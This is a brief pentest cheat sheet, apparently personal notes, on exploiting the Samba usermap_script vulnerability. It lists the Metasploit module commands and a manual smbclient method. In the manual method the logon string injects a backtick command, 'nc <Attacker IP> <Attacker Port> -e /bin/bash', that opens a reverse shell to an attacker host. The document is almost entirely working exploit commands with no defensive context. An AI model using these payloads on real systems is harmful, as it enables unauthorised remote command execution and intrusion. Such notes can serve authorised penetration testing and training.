Samba

Usermap_script

Metasploit

use exploit/multi/samba/usermap_script 
set RHOST <TARGET IP>
run

Manuel

smbclient \\<Target IP>\<share> -U ""
smb: \> logon "/= `nc <Attacker IP> <Attacker Port> -e /bin/bash`"